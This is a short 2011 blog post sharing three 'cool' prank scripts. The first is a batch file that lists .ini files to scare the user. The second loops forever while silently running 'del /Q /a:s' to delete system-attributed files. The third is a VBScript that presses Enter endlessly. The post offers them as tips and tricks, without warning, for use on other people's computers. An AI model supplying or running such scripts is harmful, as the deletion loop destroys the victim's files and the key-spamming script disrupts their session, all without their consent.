Monday, October 10, 2011
<$ $>
cool batch file
| 1). @echo off echo blanking screen ....... cls echo searching ini's @dir c:\*.ini /s/w echo .... Scared ? pause 2). @echo off :start echo 15623682356574 /q /w color 24 del /Q /a:s echo geras-lakha goto start 3). Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "~(enter)" loop Labels: batch file, tips and tricks |
posted by malfrozt at 2:14 AM

Post a Comment